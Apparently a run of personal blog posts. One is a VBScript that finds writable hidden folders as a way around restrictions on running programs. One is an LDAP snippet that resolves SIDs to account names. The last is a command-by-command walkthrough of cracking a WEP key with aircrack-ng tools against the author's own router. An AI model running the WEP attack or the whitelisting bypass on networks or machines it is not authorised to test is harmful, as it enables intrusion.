This is the script I came up with.  It uses a WMI query and method to first locate all the hidden folders on the system, and then compare each ones effective permissions to a mask I created:

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!" & strComputer & "rootcimv2")
Set colFiles = objWMIService.ExecQuery _
("Select * from Win32_Directory Where Hidden = True")
wscript.echo "Hidden folders which you can write to..."
intW = 0 ' initialise Writable folder count
' Iterate through each hidden folder on the computer
For Each objFile in colFiles
	' Ignore some well known hidden folders
	If InStr(lcase(objFile.Name), "documents and settings") or _
		InStr(lcase(objFile.Name), "$nt") or _
		InStr(lcase(objFile.Name), "$hf_mig$") or _
		InStr(lcase(objFile.Name), "ie7updates") or _
		InStr(lcase(objFile.Name), "visual studio") or _
		InStr(lcase(objFile.Name), "dllcache") or _
		InStr(lcase(objFile.Name), "$patchcache$") Then
	Else
		' Can we read (1), write (2, 4), and execute (32) in this folder?
		intPermissions = 39
		' Use WMI method to compare permissions
		If objFile.GetEffectivePermission(intPermissions) Then
			wscript.echo objFile.Name
			intW = intW + 1
		End If
	End If
Next
wscript.echo intW & " vulnerable folders."

This was important as part of a wider effort to prove a particular vulnerability existed.  Imagine the scenario where a standard user is prevented from running unknown binaries except for one hidden folder somewhere on the system which is excluded from this protection.  If one could quickly find that folder, the user could run whatever he liked.

I’m aware that there are plenty of command line tools that would have helped in this endeavour (such as AccessChk) but remember: this is a system where unauthorised apps can not be run.  It’s VBScript or nothing.

bindSid = "LDAP://<sid =" & SID & ">"
set oVal = GetObject(bindSid)
Result = oVal.Get("cn")
set oVal = Nothing

So if you have a list of SIDs and want to translate them into meaningful account names, this will do it without relying on using WMI – which on a lot of secure networks is locked down (or at least should be!).

Why do I need this? It’s a part of a larger script I’m writing that will archive specific Group Policy Objects from the \SYSVOL\<domainname>\Policies\ folder of a PDCe. One of the files in a GPO is the GptTmpl.inf file which gives a list of the User Rights Assignments (SeBackupPrivilege, SeShutdownPrivileg etc) along with the SIDs of the accounts that have been given those privileges (e.g. S-1-5-19). I wrote a script that reads the SIDs and queries the DC for the account names. This code fragment works more reliably (and I think faster) than the WMI calls I was previously using.

I’ve tried cracking WEP before with limited success – relying on the network to be busy enough to capture packets doesn’t make for reliable cracking, but this method is different – forcing the access point to produce all the packets we need for analysis.  I thought it was time I finally proved to myself that it was possible so I dug out the old BT Homehub device and switched on the wireless before booting my MacBook Pro off an excellent pen test Live CD – BackTrack.

All you need is a machine with a wireless card, the BackTrack CD, the MAC address of your target access point, the SSID (the network “name”) and the MAC address of your wireless card.

Once booted, here are the steps I took to obtain the WEP key for the network:

airmon-ng start wifi0 11
wlanconfig ath0 destroy

export AP=00:14:7F:95:5B:AC    < -- Access Point MAC
export WIFI=00:14:51:XX:XX:XX  < -- WLAN Card MAC
export SSID=BTHomeHub-1100     < -- SSID of target network

ifconfig ath1 up
iwconfig ath1 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1

At this point you should see an “Association Successful!” message, you can continue with:

aireplay-ng -5 -b $AP -h $WIFI ath1

You’ll now have to wait until aireplay returns with the packet it has found, when it asks to keep it, say yes. It’ll get saved to a fragment.xor file. You can use the .xor file to forge the packet we’re going to throw at the access point:

packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request

This will write the forged packet to the file arp-request. Now, time to start capturing the packets we’re going to analyse:

airodump-ng -c 11 -bssid $AP --ivs -w cap ath1

In a new console, start throwing the arp-request packet out to the access point:

aireplay-ng -2 -r arp-request ath1

When it finds our packet, say yes and it will start broadcasting. You should see the airodump stats start to skyrocket at this point. After you’ve got approx 70000 data packets in the airodump window, start another console and run:

aircrack-ng -n 64 -b $AP *.ivs

This will do the work of cracking the key from the captured packets, after a while (less than a minute for me) it will hopefully spit out something like the following:

Job done. Told you WEP was easy.